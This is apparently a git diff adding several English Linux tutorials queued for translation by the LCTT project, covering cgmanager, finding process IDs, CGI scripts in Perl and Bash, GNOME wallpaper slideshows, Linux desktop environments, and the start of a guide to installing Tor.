This daemon runs on the host, mounts cgroupfs into a separate mount namespace (so it's invisible from the host), binds /sys/fs/cgroup/cgmanager/sock for incoming D-Bus queries and generally handles all clients running directly on the host.
|
||||
|
||||
cgmanager accepts both authentication requests using D-Bus + SCM credentials used for translation of uid, gid and pid across namespaces or using simple "unauthenticated" (just the initial ucred) D-Bus for queries coming from the host level.
|
||||
|
||||
### cgproxy[][4]
|
||||
|
||||
You may see this daemon run in two cases. On the host if your kernel is older than 3.8 (doesn't have pidns attach support) or in containers (where only cgproxy runs).
|
||||
|
||||
cgproxy doesn't itself do any cgroup configuration change but instead as its name indicates, proxies requests to the main cgmanager process.
|
||||
|
||||
This is necessary so a process may talk to /sys/fs/cgroup/cgmanager/sock using straight D-Bus (for example using dbus-send).
|
||||
|
||||
cgproxy will then catch the ucred from that query and do an authenticated SCM query to the real cgmanager socket, passing the arguments through ucred structs so that they get properly translated into something cgmanager in the host namespace can understand.
|
||||
|
||||
### cgm[][5]
|
||||
|
||||
A simple command line tool which talks to the D-Bus service and lets you perform all the usual cgroup operations from the command line.
|
||||
|
||||
# Communication protocol[][6]
|
||||
|
||||
As mentioned above, cgmanager and cgproxy use D-Bus. It's recommended that external clients (so not cgproxy itself) use the standard D-Bus API and do not attempt to implement the SCM creds protocol as it's unnecessary and easy to get wrong.
|
||||
|
||||
Instead, simply assume that talking to /sys/fs/cgroup/cgmanager/sock will always do the right thing.
|
||||
|
||||
The cgmanager API is only available on that separate D-Bus socket, cgmanager itself doesn't attach to the system bus and so a running dbus daemon isn't a requirement of cgmanager/cgproxy.
|
||||
|
||||
You can read more about the D-Bus API [here][7].
|
||||
|
||||
# Licensing[][8]
|
||||
|
||||
CGManager is free software, most of the code is released under the terms of the GNU LGPLv2.1+ license, some binaries are released under the GNU GPLv2 license.
|
||||
|
||||
The default license for the project is the GNU LGPLv2.1+.
|
||||
|
||||
# Support[][9]
|
||||
|
||||
CGManager's stable release support relies on the Linux distributions and their own commitment to pushing stable fixes and security updates.
|
||||
|
||||
Commercial support for CGManager on Ubuntu LTS releases can be obtained from [Canonical Ltd][10].
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://linuxcontainers.org/cgmanager/introduction/
|
||||
|
||||
作者:[Canonical Ltd. ][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:http://www.canonical.com/
|
||||
[1]:https://linuxcontainers.org/cgmanager/introduction/#whats-cgmanager
|
||||
[2]:https://linuxcontainers.org/cgmanager/introduction/#components
|
||||
[3]:https://linuxcontainers.org/cgmanager/introduction/#cgmanager
|
||||
[4]:https://linuxcontainers.org/cgmanager/introduction/#cgproxy
|
||||
[5]:https://linuxcontainers.org/cgmanager/introduction/#cgm
|
||||
[6]:https://linuxcontainers.org/cgmanager/introduction/#communication-protocol
|
||||
[7]:https://linuxcontainers.org/cgmanager/dbus-api/
|
||||
[8]:https://linuxcontainers.org/cgmanager/introduction/#licensing
|
||||
[9]:https://linuxcontainers.org/cgmanager/introduction/#support
|
||||
[10]:http://www.canonical.com/
|
@ -0,0 +1,105 @@
|
||||
4 Easiest Ways To Find Out Process ID (PID) In Linux
|
||||
======
|
||||
Everybody knows about PID, Exactly what is PID? Why you want PID? What are you going to do using PID? Are you having the same questions on your mind? If so, you are in the right place to get all the details.
|
||||
|
||||
Mainly, we are looking PID to kill an unresponsive program and it's similar to Windows task manager. Linux GUI also offering the same feature but CLI is an efficient way to perform the kill operation.
|
||||
|
||||
### What Is Process ID?
|
||||
|
||||
PID stands for process identification number which is generally used by most operating system kernels such as Linux, Unix, macOS and Windows. It is a unique identification number that is automatically assigned to each process when it is created in an operating system. A process is a running instance of a program.
|
||||
|
||||
**Suggested Read :** [How To Check Apache Web Server Uptime In Linux][1]
|
||||
|
||||
Each time process ID will be getting change to all the processes except init because init is always the first process on the system and is the ancestor of all other processes. It's PID is 1.
|
||||
|
||||
The default maximum value of PIDs is `32,768`. The same has been verified by running the following command on your system `cat /proc/sys/kernel/pid_max`. On 32-bit systems 32768 is the maximum value but we can set to any value up to 2^22 (approximately 4 million) on 64-bit systems.
|
||||
|
||||
You may ask, why we need such amount of PIDs? because we can't reused the PIDs immediately that's why. Also in order to prevent possible errors.
|
||||
|
||||
The PIDs for the running processes on the system can be found by using the pidof command, pgrep command, ps command, and pstree command.
|
||||
|
||||
### Method-1 : Using pidof Command
|
||||
|
||||
pidof used to find the process ID of a running program. It's prints those id's on the standard output. To demonstrate this, we are going to find out the Apache2 process id from Debian 9 (stretch) system.
|
||||
```
|
||||
# pidof apache2
|
||||
3754 2594 2365 2364 2363 2362 2361
|
||||
|
||||
```
|
||||
|
||||
From the above output you may face difficulties to identify the Process ID because it's shows all the PIDs (included Parent and Childs) aginst the process name. Hence we need to find out the parent PID (PPID), which is the one we are looking. It could be the first number. In my case it's `3754` and it's shorted in descending order.
|
||||
|
||||
### Method-2 : Using pgrep Command
|
||||
|
||||
pgrep looks through the currently running processes and lists the process IDs which match the selection criteria to stdout.
|
||||
```
|
||||
# pgrep apache2
|
||||
2361
|
||||
2362
|
||||
2363
|
||||
2364
|
||||
2365
|
||||
2594
|
||||
3754
|
||||
|
||||
```
|
||||
|
||||
This also similar to the above output but it's shorting the results in ascending order, which clearly says that the parent PID is the last one. In my case it's `3754`.
|
||||
|
||||
**Note :** If you have more than one process id of the process, you may face trouble to identify the parent process id when using pidof & pgrep command.
|
||||
|
||||
### Method-3 : Using pstree Command
|
||||
|
||||
pstree shows running processes as a tree. The tree is rooted at either pid or init if pid is omitted. If a user name is specified in the pstree command then it's shows all the process owned by the corresponding user.
|
||||
|
||||
pstree visually merges identical branches by putting them in square brackets and prefixing them with the repetition count.
|
||||
```
|
||||
# pstree -p | grep "apache2"
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
| |-apache2(2362)
|
||||
| |-apache2(2363)
|
||||
| |-apache2(2364)
|
||||
| |-apache2(2365)
|
||||
| `-apache2(2594)
|
||||
|
||||
```
|
||||
|
||||
To get parent process alone, use the following format.
|
||||
```
|
||||
# pstree -p | grep "apache2" | head -1
|
||||
|- apache2(3754) -|-apache2(2361)
|
||||
|
||||
```
|
||||
|
||||
pstree command is very simple because it's segregating the Parent and Child processes separately but it's not easy when using pidof & pgrep command.
|
||||
|
||||
### Method-4 : Using ps Command
|
||||
|
||||
ps displays information about a selection of the active processes. It displays the process ID (pid=PID), the terminal associated with the process (tname=TTY), the cumulated CPU time in [DD-]hh:mm:ss format (time=TIME), and the executable name (ucmd=CMD). Output is unsorted by default.
|
||||
```
|
||||
# ps aux | grep "apache2"
|
||||
www-data 2361 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2362 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2363 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2364 0.0 0.4 302652 9732 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2365 0.0 0.4 302652 8400 ? S 06:25 0:00 /usr/sbin/apache2 -k start
|
||||
www-data 2594 0.0 0.4 302652 8400 ? S 06:55 0:00 /usr/sbin/apache2 -k start
|
||||
root 3754 0.0 1.4 302580 29324 ? Ss Dec11 0:23 /usr/sbin/apache2 -k start
|
||||
root 5648 0.0 0.0 12784 940 pts/0 S+ 21:32 0:00 grep apache2
|
||||
|
||||
```
|
||||
|
||||
From the above output we can easily identify the parent process id (PPID) based on the process start date. In my case apache2 process was started @ `Dec11` which is the parent and others are child's. PID of apache2 is `3754`.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.2daygeek.com/how-to-check-find-the-process-id-pid-ppid-of-a-running-program-in-linux/
|
||||
|
||||
作者:[Magesh Maruthamuthu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.2daygeek.com/author/magesh/
|
||||
[1]:https://www.2daygeek.com/check-find-apache-httpd-web-server-uptime-linux/
|
@ -0,0 +1,129 @@
|
||||
How to generate webpages using CGI scripts
|
||||
======
|
||||
Back in the stone age of the Internet when I first created my first business website, life was good.
|
||||
|
||||
I installed Apache and created a few simple HTML pages that stated a few important things about my business and gave important information like an overview of my product and how to contact me. It was a static website because the content seldom changed. Maintenance was simple because of the unchanging nature of my site.
|
||||
|
||||
## Static content
|
||||
|
||||
Static content is easy and still common. Let's take a quick look at a couple sample static web pages. You don't need a working website to perform these little experiments. Just place the files in your home directory and open them with your browser. You will see exactly what you would if the file were served to your browser via a web server.
|
||||
|
||||
The first thing you need on a static website is the index.html file which is usually located in the /var/www/html directory. This file can be as simple as a text phrase such as "Hello world" without any HTML markup at all. This would simply display the text string. Create index.html in your home directory and add "Hello world" (without the quotes) as it's only content. Open the index.html in your browser with the following URL.
|
||||
```
|
||||
file:///home/<yourhomedirectory>/index.html
|
||||
```
|
||||
|
||||
So HTML is not required, but if you had a large amount of text that needed formatting, the results of a web page with no HTML coding would be incomprehensible with everything running together.
|
||||
|
||||
So the next step is to make the content more readable by using a bit of HTML coding to provide some formatting. The following command creates a page with the absolute minimum markup required for a static web page with HTML. You could also use your favorite editor to create the content.
|
||||
```
|
||||
echo "<h1>Hello World</h1>" > test1.html
|
||||
```
|
||||
|
||||
Now view index.html and see the difference.
|
||||
|
||||
Of course you can put a lot of additional HTML around the actual content line to make a more complete and standard web page. That more complete version as shown below will still display the same results in the browser, but it also forms the basis for more standardized web site. Go ahead and use this content for your index.html file and display it in your browser.
|
||||
```
|
||||
<!DOCTYPE HTML PUBLIC "-//w3c//DD HTML 4.0//EN">
|
||||
<html>
|
||||
<head>
|
||||
<title>My Web Page</title>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Hello World</h1>
|
||||
</body>
|
||||
</html>
|
||||
```
|
||||
|
||||
I built a couple static websites using these techniques, but my life was about to change.
|
||||
|
||||
## Dynamic web pages for a new job
|
||||
|
||||
I took a new job in which my primary task was to create and maintain the CGI ([Common Gateway Interface][6]) code for a very dynamic website. In this context, dynamic means that the HTML needed to produce the web page on a browser was generated from data that could be different every time the page was accessed. This includes input from the user on a web form that is used to look up data in a database. The resulting data is surrounded by appropriate HTML and displayed on the requesting browser. But it does not need to be that complex.
|
||||
|
||||
Using CGI scripts for a website allows you to create simple or complex interactive programs that can be run to provide a dynamic web page that can change based on input, calculations, current conditions in the server, and so on. There are many languages that can be used for CGI scripts. We will look at two of them, Perl and Bash. Other popular CGI languages include PHP and Python.
|
||||
|
||||
This article does not cover installation and setup of Apache or any other web server. If you have access to a web server that you can experiment with, you can directly view the results as they would appear in a browser. Otherwise, you can still run the programs from the command line and view the HTML that would be created. You can also redirect that HTML output to a file and then display the resulting file in your browser.
|
||||
|
||||
### Using Perl
|
||||
|
||||
Perl is a very popular language for CGI scripts. Its strength is that it is a very powerful language for the manipulation of text.
|
||||
|
||||
To get CGI scripts to execute, you need the following line in the in httpd.conf for the website you are using. This tells the web server where your executable CGI files are located. For this experiment, let's not worry about that.
|
||||
```
|
||||
ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
|
||||
```
|
||||
|
||||
Add the following Perl code to the file index.cgi, which should be located in your home directory for your experimentation. Set the ownership of the file to apache.apache when you use a web server, and set the permissions to 755 because it must be executable no matter where it is located.
|
||||
|
||||
```
|
||||
#!/usr/bin/perl
|
||||
print "Content-type: text/html\n\n";
|
||||
print "<html><body>\n";
|
||||
print "<h1>Hello World</h1>\n";
|
||||
print "Using Perl<p>\n";
|
||||
print "</body></html>\n";
|
||||
```
|
||||
|
||||
Run this program from the command line and view the results. It should display the HTML code it will generate.
|
||||
|
||||
Now view the index.cgi in your browser. Well, all you get is the contents of the file. Browsers really need to have this delivered as CGI content. Apache does not really know that it needs to run the file as a CGI program unless the Apache configuration for the web site includes the "ScriptAlias" definition as shown above. Without that bit of configuration Apache simply send the data in the file to the browser. If you have access to a web server, you could try this out with your executable index files in the /var/www/cgi-bin directory.
|
||||
|
||||
To see what this would look like in your browser, run the program again and redirect the output to a new file. Name it whatever you want. Then use your browser to view the file that contains the generated content.
|
||||
|
||||
The above CGI program is still generating static content because it always displays the same output. Add the following line to your CGI program immediately after the "Hello World" line. The Perl "system" command executes the commands following it in a system shell, and returns the result to the program. In this case, we simply grep the current RAM usage out of the results from the free command.
|
||||
|
||||
```
|
||||
system "free | grep Mem\n";
|
||||
```
|
||||
|
||||
Now run the program again and redirect the output to the results file. Reload the file in the browser. You should see an additional line so that displays the system memory statistics. Run the program and refresh the browser a couple more times and notice that the memory usage should change occasionally.
|
||||
|
||||
### Using Bash
|
||||
|
||||
Bash is probably the simplest language of all for use in CGI scripts. Its primary strength for CGI programming is that it has direct access to all of the standard GNU utilities and system programs.
|
||||
|
||||
Rename the existing index.cgi to Perl.index.cgi and create a new index.cgi with the following content. Remember to set the permissions correctly to executable.
|
||||
|
||||
```
|
||||
#!/bin/bash
|
||||
echo "Content-type: text/html"
|
||||
echo ""
|
||||
echo '<html>'
|
||||
echo '<head>'
|
||||
echo '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">'
|
||||
echo '<title>Hello World</title>'
|
||||
echo '</head>'
|
||||
echo '<body>'
|
||||
echo '<h1>Hello World</h1><p>'
|
||||
echo 'Using Bash<p>'
|
||||
free | grep Mem
|
||||
echo '</body>'
|
||||
echo '</html>'
|
||||
exit 0
|
||||
```
|
||||
|
||||
Execute this program from the command line and view the output, then run it and redirect the output to the temporary results file you created before. Then refresh the browser to view what it looks like displayed as a web page.
|
||||
|
||||
## Conclusion
|
||||
|
||||
It is actually very simple to create CGI programs that can be used to generate a wide range of dynamic web pages. This is a trivial example but you should now see some of the possibilities.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/cgi-scripts
|
||||
|
||||
作者:[David Both][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/dboth
|
||||
[1]:http://december.com/html/4/element/html.html
|
||||
[2]:http://december.com/html/4/element/head.html
|
||||
[3]:http://december.com/html/4/element/title.html
|
||||
[4]:http://december.com/html/4/element/body.html
|
||||
[5]:http://december.com/html/4/element/h1.html
|
||||
[6]:https://en.wikipedia.org/wiki/Common_Gateway_Interface
|
||||
[7]:http://perldoc.perl.org/functions/system.html
|
@ -0,0 +1,101 @@
|
||||
How to set GNOME to display a custom slideshow
|
||||
======
|
||||
A very cool, yet lesser known, feature in GNOME is its ability to display a slideshow as your wallpaper. You can select a wallpaper slideshow from the background settings panel in the [GNOME Control Center][1]. Wallpaper slideshows can be distinguished from static wallpapers by a small clock emblem displayed in the lower-right corner of the preview.
|
||||
|
||||
Some distributions come with pre-installed slideshow wallpapers. For example, Ubuntu includes the stock GNOME timed wallpaper slideshow, as well as one of Ubuntu wallpaper contest winners.
|
||||
|
||||
What if you want to create your own custom slideshow to use as a wallpaper? While GNOME doesn't provide a user interface for this, it's quite simple to create one using some simple XML files in your home directory. Fortunately, the background selection in the GNOME Control Center honors some common directory paths, which makes it easy to create a slideshow without having to edit anything provided by your distribution.
|
||||
|
||||
### Getting started
|
||||
|
||||
Using your favorite text editor, create an XML file in `$HOME/.local/share/gnome-background-properties/`. Although the filename isn't important, the directory name matters (and you'll probably have to create the directory). For my example, I created `/home/ken/.local/share/gnome-background-properties/osdc-wallpapers.xml `with the following content:
|
||||
```
|
||||
<?xml version="1.0" encoding="UTF-8"?>
|
||||
<!DOCTYPE wallpapers SYSTEM "gnome-wp-list.dtd">
|
||||
<wallpapers>
|
||||
<wallpaper deleted="false">
|
||||
<name>Opensource.com Wallpapers</name>
|
||||
<filename>/home/ken/Pictures/Wallpapers/osdc/osdc.xml</filename>
|
||||
<options>zoom</options>
|
||||
</wallpaper>
|
||||
</wallpapers>
|
||||
```
|
||||
|
||||
The above XML file needs a `<wallpaper>` stanza for each slideshow or static wallpaper you want to include in the `backgrounds` panel of the GNOME Control Center.
|
||||
|
||||
In this example, my `osdc.xml` file looks like this:
|
||||
|
||||
```
|
||||
<?xml version="1.0" ?>
|
||||
<background>
|
||||
<static>
|
||||
<!-- Duration in seconds to display the background -->
|
||||
<duration>30.0</duration>
|
||||
<file>/home/ken/Pictures/Wallpapers/osdc/osdc_2.png</file>
|
||||
</static>
|
||||
<transition>
|
||||
<!-- Duration of the transition in seconds, default is 2 seconds -->
|
||||
<duration>0.5</duration>
|
||||
<from>/home/ken/Pictures/Wallpapers/osdc/osdc_2.png</from>
|
||||
<to>/home/ken/Pictures/Wallpapers/osdc/osdc_1.png</to>
|
||||
</transition>
|
||||
<static>
|
||||
<duration>30.0</duration>
|
||||
<file>/home/ken/Pictures/Wallpapers/osdc/osdc_1.png</file>
|
||||
</static>
|
||||
<transition>
|
||||
<duration>0.5</duration>
|
||||
<from>/home/ken/Pictures/Wallpapers/osdc/osdc_1.png</from>
|
||||
<to>/home/ken/Pictures/Wallpapers/osdc/osdc_2.png</to>
|
||||
</transition>
|
||||
</background>
|
||||
```
|
||||
|
||||
There are a few important pieces in the above XML. The `<background>` node in the XML is your outer node. Each background supports multiple `<static>` and `<transition>` nodes.
|
||||
|
||||
The `<static>` node defines an image to be displayed and the duration to display it with `<duration>` and `<file>` nodes, respectively.
|
||||
|
||||
The `<transition>` node defines the `<duration>`, the `<from>` image, and the `<to>` image for each transition.
|
||||
|
||||
### Changing wallpaper throughout the day
|
||||
|
||||
Another cool GNOME feature is time-based slideshows. You can define the start time for the slideshow and GNOME will calculate times based on it. This is useful for setting different wallpapers based on the time of day. For example, you could set the start time to 06:00 and display one wallpaper until 12:00, then change it for the afternoon, and again at 18:00.
|
||||
|
||||
This is accomplished by defining the `<starttime>` in your XML like this:
|
||||
```
|
||||
<starttime>
|
||||
<!-- A start time in the past is fine -->
|
||||
<year>2017</year>
|
||||
<month>11</month>
|
||||
<day>21</day>
|
||||
<hour>6</hour>
|
||||
<minute>00</minute>
|
||||
<second>00</second>
|
||||
</starttime>
|
||||
```
|
||||
|
||||
The above XML started the animation at 06:00 on November 21, 2017, with a duration of 21,600.00, equal to six hours. This displays your morning wallpaper until 12:00, at which time it changes to your next wallpaper. You can continue in this manner to change the wallpaper at any intervals you'd like throughout the day, but ensure the total of all your durations is 86,400 seconds (equal to 24 hours).
|
||||
|
||||
GNOME will calculate the delta between the start time and the current time and display the correct wallpaper for the current time. For example, if you select your new wallpaper at 16:00, GNOME will display the proper wallpaper for 36,000 seconds past the start time of 06:00.
|
||||
|
||||
For a complete example, see the adwaita-timed slideshow provided by the gnome-backgrounds package in most distributions. It's usually found in `/usr/share/backgrounds/gnome/adwaita-timed.xml`.
|
||||
|
||||
### For more information
|
||||
|
||||
Hopefully this encourages you to take a dive into creating your own slideshow wallpapers. If you would like to download complete versions of the files referenced in this article, they can be found on [GitHub][2].
|
||||
|
||||
If you're interested in utility scripts for generating the XML files, you can do an internet search for gnome-background-generator.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://opensource.com/article/17/12/create-your-own-wallpaper-slideshow-gnome
|
||||
|
||||
作者:[Ken Vandine][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://opensource.com/users/kenvandine
|
||||
[1]:http://manpages.ubuntu.com/manpages/xenial/man1/gnome-control-center.1.html
|
||||
[2]:https://github.com/kenvandine/misc/tree/master/articles/osdc/gnome/slide-show-backgrounds/osdc
|
@ -0,0 +1,108 @@
|
||||
Migrating to Linux: Graphical Environments
|
||||
======
|
||||
This is the third article in our series on migrating to Linux. If you missed earlier articles, they provided an [introduction to Linux for new users][1] and an [overview of Linux files and filesystems][2]. In this article, we'll discuss graphical environments. One of the advantages of Linux is that you have lots of choices, and you can select a graphical interface and customize it to work just the way you like it.
|
||||
|
||||
Some of the popular graphical environments in Linux include: Cinnamon, Gnome, KDE Plasma, Xfce, and MATE, but there are many options.
|
||||
|
||||
One thing that is often confusing to new Linux users is that, although specific Linux distributions have a default graphical environment, usually you can change the graphical interface at any time. This is different from what people are used to with Windows and Mac OS. The distribution and the graphical environment are separate things, and in many cases, they aren't tightly coupled together. Additionally, you can run applications built for one graphical environment inside other graphical environments. For example, an application built for the KDE Plasma graphical interface will typically run just fine in the Gnome desktop graphical environment.
|
||||
|
||||
Some Linux graphical environments try to mimic Microsoft Windows or Apple's MacOS to a degree because that's what some people are familiar with, but other graphical interfaces are unique.
|
||||
|
||||
Below, I'll cover several options showcasing different graphical environments running on different distributions. If you are unsure about which distribution to go with, I recommend starting with [Ubuntu][3]. Get the Long Term Support (LTS) version (which is 16.04.3 at the time of writing). Ubuntu is very stable and easy to use.
|
||||
|
||||
### Transitioning from Mac
|
||||
|
||||
The Elementary OS distribution provides a very Mac-like interface. It's default graphical environment is called Pantheon, and it makes transitioning from a Mac easy. It has a dock at the bottom of the screen and is designed to be extremely simple to use. In its aim to keep things simple, many of the default apps don't even have menus. Instead, there are buttons and controls on the title bar of the application (Figure 1).
|
||||
|
||||
|
||||
![Elementary OS][5]
|
||||
|
||||
Figure 1: Elementary OS with Pantheon.
|
||||
|
||||
The Ubuntu distribution presents a default graphical interface that is also very Mac like. Ubuntu 17.04 or older uses the graphical environment called Unity, which by default places the dock on the left side of the screen and has a global menu bar area at the top that is shared across all applications. Note that newer versions of Ubuntu are switching to the Gnome environment.
|
||||
|
||||
### Transitioning from Windows
|
||||
|
||||
ChaletOS models its interface after Windows to help make migrating from Windows easier. ChaletOS used the graphical environment called Xfce (Figure 2). It has a home/start menu in the usual lower left corner of the screen with the search bar. There are desktop icons and notifications in the lower right corner. It looks so much like Windows that, at first glance, people may even assume you are running Windows.
|
||||
|
||||
The Zorin OS distribution also tries to mimic Windows. Zorin OS uses the Gnome desktop modified to work like Windows' graphical interface. The start button is at the bottom left with the notification and indicator panel on the lower right. The start button brings up a Windows-like list of applications and a search bar to search.
|
||||
|
||||
### Unique Environments
|
||||
|
||||
One of the most commonly used graphical environments for Linux is the Gnome desktop (Figure 3). Many distributions use Gnome as the default graphical environment. Gnome by default doesn't try to be like Windows or MacOS but aims for elegance and ease of use in its own way.
|
||||
|
||||
The Cinnamon environment was created mostly out of a negative reaction to the Gnome desktop environment when it changed drastically from version 2 to version 3. Although Cinnamon doesn't look like the older Gnome desktop version 2, it attempts to provide a simple interface, which functions somewhat similar to that of Windows XP.
|
||||
|
||||
The graphical environment called MATE is modeled directly after Gnome version 2, which has a menu bar at the top of the screen for applications and settings, and it presents a panel at the bottom of the screen for running application tabs and other widgets.
|
||||
|
||||
The KDE plasma environment is built around a widget interface where widgets can be installed on the desktop or in a panel (Figure 4).
|
||||
|
||||
![KDE Plasma][8]
|
||||
|
||||
Figure 4: Kubuntu with KDE Plasma.
|
||||
|
||||
[Used with permission][6]
|
||||
|
||||
No graphical environment is better than another. They're just different to suit different people's tastes. And again, if the options seem too much, start with [Ubuntu][3].
|
||||
|
||||
### Differences and Similarities
|
||||
|
||||
Different operating systems do some things differently, which can make the transition challenging. For example, menus may appear in different places and settings may use different paths to access options. Here I list a few things that are similar and different in Linux to help ease the adjustment.
|
||||
|
||||
### Mouse
|
||||
|
||||
The mouse often works differently in Linux than it does in Windows and MacOS. In Windows and Mac, you double-click on most things to open them up. In Linux, many Linux graphical interfaces are set so that you single click on the item to open it.
|
||||
|
||||
Also in Windows, you usually have to click on a window to make it the focused window. In Linux, many interfaces are set so that the focus window is the one under the mouse, even if it's not on top. The difference can be subtle, and sometimes the behavior is surprising. For example, in Windows if you have a background application (not the top window) and you move the mouse over it, without clicking, and scroll the mouse wheel, the top application window will scroll. In Linux, the background window (the one with the mouse over it) will scroll instead.
|
||||
|
||||
### Menus
|
||||
|
||||
Application menus are a staple of computer programs and recently there seems to be a movement to move the menus out of the way or to remove them altogether. So when migrating to Linux, you may not find menus where you expect. The application menu might be in a global shared menu bar like on MacOS. The menu might be below a "more options" icon, similar to those in many mobile applications. Or, the menu may be removed altogether in exchange for buttons, as with some of the apps in the Pantheon environment in Elementary OS.
|
||||
|
||||
### Workspaces
|
||||
|
||||
Many Linux graphical environments present multiple workspaces. A workspace fills your entire screen and contains windows of some running applications. Switching to a different workspace will change which applications are visible. The concept is to group the open applications used for one project together on one workspace and those for another project on a different workspace.
|
||||
|
||||
Not everyone needs or even likes workspaces, but I mention these because sometimes, as a newcomer, you might accidentally switch workspaces with a key combination, and go, "Hey! where'd my applications go?" If all you see is the desktop wallpaper image where you expected to see your apps, chances are you've just switched workspaces, and your programs are still running in a workspace that is now not visible. In many Linux environments, you can switch workspaces by pressing Alt-Ctrl and then an arrow (up, down. left or right). Hopefully, you'll see your programs still there in another workspace.
|
||||
|
||||
Of course, if you happen to like workspaces (many people do), then you have found a useful default feature in Linux.
|
||||
|
||||
### Settings
|
||||
|
||||
Many Linux graphical environments also have some type of settings program or settings panel that let you configure settings on the machine. Note that similarly to Windows and MacOS, things in Linux can be configured in fine detail, and not all of these detailed settings can be found in the settings program. These settings, though, should be enough for most of the things you'll need to set on a typical desktop system, such as selecting the desktop wallpaper, changing how long before the screen goes blank, and connecting to printers, to name a few.
|
||||
|
||||
The settings presented in the application will usually not be grouped the same way or named the same way they are on Windows or MacOS. Even different graphical interfaces in Linux can present settings differently, which may take time to adjust to. Online search, of course, is a great place to search for answers on how to configure things in your graphical environment.
|
||||
|
||||
### Applications
|
||||
|
||||
Finally, applications in Linux might be different. You will likely find some familiar applications but others may be completely new to you. For example, you can find Firefox, Chrome, and Skype on Linux. If you can't find a specific app, there's usually an alternative program you can use. If not, you can run many Windows applications in a compatibility layer called WINE.
|
||||
|
||||
On many Linux graphical environments, you can bring up the applications menu by pressing the Windows Logo key on the keyboard. In others, you need to click on a start/home button or click on an applications menu. In many of the graphical environments, you can search for an application by category rather than by its specific name. For example, if you want to use an editor program but you don't know what it's called, you can bring up the application menu and enter "editor" in the search bar, and it will show you one or more applications that are considered editors.
|
||||
|
||||
To get you started, here is a short list of a few applications and potential Linux alternatives.
|
||||
|
||||
[linux][10]
|
||||
|
||||
Note that this list is by no means comprehensive; Linux offers a multitude of options to meet your needs.
|
||||
|
||||
Learn more about Linux through the free ["Introduction to Linux" ][9]course from The Linux Foundation and edX.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.linux.com/blog/learn/2017/12/migrating-linux-graphical-environments
|
||||
|
||||
作者:[John Bonesio][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.linux.com/users/johnbonesio
|
||||
[1]:https://www.linux.com/blog/learn/intro-to-linux/2017/10/migrating-linux-introduction
|
||||
[2]:https://www.linux.com/blog/learn/intro-to-linux/2017/11/migrating-linux-disks-files-and-filesystems
|
||||
[3]:https://www.evernote.com/OutboundRedirect.action?dest=https%3A%2F%2Fwww.ubuntu.com%2Fdownload%2Fdesktop
|
||||
[5]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/elementaryos.png?itok=kJk2-BsL (Elementary OS)
|
||||
[8]:https://www.linux.com/sites/lcom/files/styles/rendered_file/public/kubuntu.png?itok=a2E7ttaa (KDE Plasma)
|
||||
[9]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
|
||||
|
||||
[10]: https://www.linux.com/sites/lcom/files/styles/rendered_file/public/linux-options.png?itok=lkqD1UMj
|
@ -0,0 +1,104 @@
|
||||
translating---geekpi
|
||||
|
||||
Surf anonymously: Learn to install TOR network on Linux
|
||||
======
|
||||
Tor Network is an anonymous network to secure your internet & privacy. Tor network is a group of volunteer operated servers. Tor protects internet communication by bouncing it around a distributed network of relay system run by volunteers. This prevents us from people snooping the internet, they can't learn what site we visit or where is the user physically & it also allows us to use blocked websites.
|
||||
|
||||
In this tutorial, we will learn to install Tor network on various Linux operating systems & how we can use it configure our applications to secure the communications.
|
||||
|
||||
**(Recommended Read:[How to install Tor Browser on Linux (Ubuntu, Mint, RHEL, Fedora, CentOS)][1])**
|
||||
|
||||
### CentOS/RHEL/Fedora
|
||||
|
||||
Tor packages are part of EPEL repositories, so we can simply install Tor using yum if we have EPEL repositories installed. If you need to install EPEL repos on your system, use the suitable command (based on OS & Architecture) from the following ,
|
||||
|
||||
**RHEL/CentOS 7**
|
||||
|
||||
**$ sudo rpm -Uvh https://dl.fedoraproject.org/pub/epel/7/x86_64/e/epel-release-7-11.noarch.rpm**
|
||||
|
||||
**RHEL/CentOS 6 (64 Bit)**
|
||||
|
||||
**$ sudo rpm -Uvh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm**
|
||||
|
||||
**RHEL/CentOS 6 (32 Bit)**
|
||||
|
||||
**$ sudo rpm -Uvh http://dl.fedoraproject.org/pub/epel/6/i386/epel-release-6-8.noarch.rpm**
|
||||
|
||||
